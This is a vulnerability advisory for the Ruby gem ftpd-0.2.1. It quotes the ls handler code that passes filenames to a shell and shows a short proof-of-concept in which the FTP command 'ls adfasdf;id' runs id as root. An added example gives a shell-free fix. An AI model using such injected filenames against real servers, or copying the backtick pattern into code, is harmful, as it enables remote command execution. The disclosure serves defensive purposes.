Title: Remote command execution for Ruby Gem ftpd-0.2.1

The ls interface can have commands injected into it if the option or filename contains the shell character ;

The example.rb server, which I used to test the ftp library, listens on localhost only. But if this gem is used normally, it could be configured to listen on 0.0.0.0.

PoC:
For this to work, the file must exist in the CWD.

ftp>
root@ubuntu:/tmp# sh /tmp/connect-to-example-ftp-server.sh
Connected to localhost.
220 ftpd
Name (localhost:root):
331 Password required
Password:
230 Logged in
Remote system type is UNIX.
Using binary mode to transfer files.

* I created the filename adfasdf

ftp> ls adfasdf;id
200 PORT command successful
150 Opening ASCII mode data connection
-rw-r--r-- 1 root root 0 Mar 2 05:52 adfasdf
uid=0(root) gid=0(root) groups=0(root)
226 Transfer complete
ftp>

./ftpd-0.2.1/lib/ftpd/disk_file_system.rb

The problem code is below:

    # Ls interface used by List and NameList

    module Ls

      def ls(ftp_path, option)
        path = expand_ftp_path(ftp_path)
        dirname = File.dirname(path)
        filename = File.basename(path)
        command = [
          'ls',
          option,
          filename,    # <-- ;cmd inject
          '2>&1',
        ].compact.join(' ')
        if File.exists?(dirname)    # <- file has to exist to exec ls command
          list = Dir.chdir(dirname) do
            `#{command}`    # <-- exec
          end
        end
        # ... remainder of the method is not shown in this excerpt
      end
    end
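
A shell-free way to build the same listing, as an added example (not code from this advisory or from the ftpd gem): the arguments reach ls as an argv array through Open3.capture2e, so a ; in the filename is never parsed by a shell, and the option is checked against a fixed list. The names safe_ls, ALLOWED_LS_OPTIONS and demo_listings, and the contents of the allowlist, are assumptions made for illustration.

```ruby
require 'open3'
require 'tmpdir'
require 'fileutils'

# Assumed allowlist of ls flags a LIST/NLST handler needs (not taken from the gem).
ALLOWED_LS_OPTIONS = %w[-l -a -la -al -1].freeze

# Shell-free counterpart of Ls#ls. Arguments travel as an argv array, so no
# shell parses them and ';' is only a character inside a file name.
def safe_ls(dirname, filename, option = nil)
  unless option.nil? || ALLOWED_LS_OPTIONS.include?(option)
    raise ArgumentError, "unsupported ls option: #{option.inspect}"
  end
  return '' unless File.directory?(dirname)

  argv = ['ls', option, '--', filename].compact # '--' stops option parsing
  # capture2e merges stderr into stdout, replacing the shell's '2>&1';
  # chdir: replaces Dir.chdir without changing the server process's own CWD.
  output, _status = Open3.capture2e(*argv, chdir: dirname)
  output
end

# Constructed sample input: a scratch directory holding the PoC's file name.
def demo_listings
  Dir.mktmpdir('ftpd-ls-demo') do |dir|
    FileUtils.touch(File.join(dir, 'adfasdf'))
    rejected = begin
      safe_ls(dir, 'adfasdf', '-l;id')
    rescue ArgumentError => e
      e.message
    end
    {
      benign: safe_ls(dir, 'adfasdf', '-l'),
      injected_name: safe_ls(dir, 'adfasdf;id', '-l'),
      injected_option: rejected,
    }
  end
end

if __FILE__ == $PROGRAM_NAME
  demo_listings.each { |label, text| puts "#{label}: #{text}" }
end
```

With the PoC's input, ls reports that no file named adfasdf;id exists instead of running a second command.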